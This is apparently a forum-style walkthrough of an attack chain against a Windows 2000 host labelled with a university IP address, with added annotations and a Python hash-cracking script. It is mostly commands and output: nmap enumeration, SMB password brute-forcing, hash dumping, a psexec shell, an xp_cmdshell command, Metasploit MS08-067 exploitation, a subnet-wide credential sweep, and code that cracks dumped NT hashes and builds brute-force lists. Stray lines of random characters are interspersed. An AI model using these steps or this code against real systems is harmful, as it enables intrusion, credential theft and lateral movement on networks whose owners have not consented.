Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

// The MAC vendor (Cadmus Computer Systems is how Nmap labels VirtualBox's 08:00:27 OUI), the "bogon" reverse lookup and the sub-millisecond latency all say this is a local VM, not the public host the IP address suggests.
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  // list the SMB scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser  // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

// Without -sV the SERVICE column is just the nmap-services table lookup, which is why 1025 and 1026 now read NFS-or-IIS and LSA-or-nterm instead of the mstask and msrpc identified above.
- C! Z) j4 ?# t% X# j) Q- @& _
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

// Anonymous READ on IPC$ is the null session; it is what let the unauthenticated user enumeration above succeed.
" M i5 a3 g- X: U$ _% N; V s
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// guess the users' passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|  administrator:<blank> => Login was successful
|_ test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

// smb-brute drives real logon attempts against the target; on a host or domain with an account-lockout policy it can lock accounts out, so check the policy (smb-enum-domains reports it) before running it outside a lab.
$ V) i' t& d8 f( D5 b) y) E8 T6 p, P' z6 E; M. m4 q
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2  // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

// Reading the dump: "NO PASSWORD" is pwdump6's rendering of the empty-password hash, matching the blank administrator logon found by smb-brute. Windows 2000 still stores LM hashes, and LM hashes the upper-cased password in two 7-character halves; the second half of test's LM hash, AAD3B435B51404EE, is the hash of an empty half, so the password is at most 7 characters (it is 123456). The script pushes the pwdump6 binaries over the admin share and runs them as a service, which needs local administrator rights, so the test account evidently has them.
- A( |+ x k% C# u- L0 T Q
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe  // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

// PsExec copies its service binary to ADMIN$ and starts it through the service control manager, so the same administrator-level requirement as for smb-pwdump applies; -e skips loading the account's profile.
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"  // log in remotely as sa and run a command through xp_cmdshell
// 1433/tcp is not among the open ports in the scans above (the default top-1000 port set includes it), so this step presumes SQL Server is reachable on the target; the post shows no output for it.
: @! Y, f- l" s% D! `# s6 l. W9 w+ O, ~1 H
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241  // check the target for known SMB vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

// The script's own documentation warns that its checks can crash a vulnerable host; the MS08-067 probe runs by default and is only skipped with --script-args=safe=1. Later Nmap releases dropped smb-check-vulns in favour of per-issue scripts such as smb-vuln-ms08-067.
( L) \" y8 G9 R! L8 S1 t
root@bt:~# msfconsole  // exploit the MS08-067 flaw on the target from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

// bind_tcp makes the target listen and msf connect in, which is fine in a lab; where a firewall blocks inbound connections use windows/meterpreter/reverse_tcp and set LHOST instead.
$ b! b' B2 d% R+ j- @3 r
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal range with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful

// Two caveats on this step. The only hit is the blank administrator password, not the hash: password.txt holds just the LM half of test's hash, and the nmap smb library provides a separate smbhash script argument for pass-the-hash, so a bare hash in passdb is not guaranteed to be tried as one. And 192.168.1.105 reports the same MAC address and the same seven open ports as 202.103.242.241, so the sweep has found the lab VM under a second address rather than a new machine.
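The hash handling in the smb-pwdump step and the list building for the smb-brute sweep can both be done offline, before touching another host. The block below is an added example and is not code from the original post or from Nmap: it parses the post's own smb-pwdump lines (copied in as sample input), flags blank accounts and LM hashes whose empty second half gives away a password of at most 7 characters, cracks the NT hashes against a small constructed wordlist using a from-scratch MD4, and produces the userdb/passdb contents. The assumption that the installed smb library treats an LM:NT pair in passdb as a pass-the-hash credential is labelled in the code and is not verified here.

```python
"""Triage an nmap smb-pwdump result offline: flag blank accounts, read what the
LM hash gives away, crack NT hashes against a wordlist, and emit userdb/passdb
contents for a later smb-brute run.  Added example, not code from the original
post or from Nmap.  SAMPLE is the post's own smb-pwdump output; WORDLIST is
constructed for the example."""
import re
import struct

BLANK_MARKER = "NO PASSWORD"        # pwdump6's rendering of the empty-password hash
EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM hash of an empty 7-character half
_MASK = 0xFFFFFFFF

SAMPLE = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""
WORDLIST = ["password", "123456", "admin", "letmein"]   # constructed


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib's md4 is missing on OpenSSL 3 builds."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1, words in order
            a = _rotl((a + f(b, c, d) + x[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, word order 0,8,4,12,2,10,...
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a = _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), upper-case hex as pwdump prints it."""
    return md4(password.encode("utf-16-le")).hex().upper()


_LINE = re.compile(r"^\|_?\s*([^:]+):(\d+)\s*=>\s*([^:]+):(.+?)\s*$")


def parse_pwdump(output: str) -> list:
    """Turn the smb-pwdump host-script lines into account records."""
    accounts = []
    for line in output.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        has_lm = not lm.startswith(BLANK_MARKER)
        has_nt = not nt.startswith(BLANK_MARKER)
        accounts.append({
            "user": user, "rid": int(rid),
            "lm": lm if has_lm else None,
            "nt": nt if has_nt else None,
            "blank": not has_lm and not has_nt,
            # LM hashes the upper-cased password in two 7-char halves; an empty
            # second half means the password is at most 7 characters long
            "short": has_lm and lm[16:] == EMPTY_LM_HALF,
        })
    return accounts


def crack_nt(accounts: list, wordlist: list) -> dict:
    """Offline dictionary attack on the NT hashes; blank accounts need no cracking."""
    table = {nt_hash(w): w for w in wordlist}
    found = {}
    for acct in accounts:
        if acct["blank"]:
            found[acct["user"]] = ""
        elif acct["nt"] in table:
            found[acct["user"]] = table[acct["nt"]]
    return found


def smb_brute_lists(accounts: list, cracked: dict) -> tuple:
    """userdb/passdb lines for nmap --script smb-brute against other hosts.
    Cracked cleartext goes in as-is; for the rest the LM:NT pair is written,
    assuming (not verified here) that the installed nmap smb library treats a
    hash-shaped passdb entry as a pass-the-hash credential."""
    users = [a["user"] for a in accounts]
    passwords = set()
    for a in accounts:
        if cracked.get(a["user"]):
            passwords.add(cracked[a["user"]])
        elif a["lm"] and a["nt"]:
            passwords.add(f"{a['lm']}:{a['nt']}")
    return users, sorted(passwords)


if __name__ == "__main__":
    accts = parse_pwdump(SAMPLE)
    got = crack_nt(accts, WORDLIST)
    for a in accts:
        state = "blank password" if a["blank"] else got.get(a["user"], "not in wordlist")
        print(f"{a['user']:15} {state}{'  (LM says <= 7 chars)' if a['short'] else ''}")
    users, passwords = smb_brute_lists(accts, got)
    print("usernames.txt:", users)
    print("password.txt:", passwords)
```

nt_hash("123456") reproduces the NT hash the post dumped for test, 32ED87BDB5FDC5E9CBA88547376818D4, which is why the four-word list recovers it; TsInternetUser stays uncracked and goes into the list as its LM:NT pair. Blank accounts are reported but written to neither file, since smb-brute's default guessing already found the blank administrator above.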
Attack successful: a simple nmap + msf attack chain.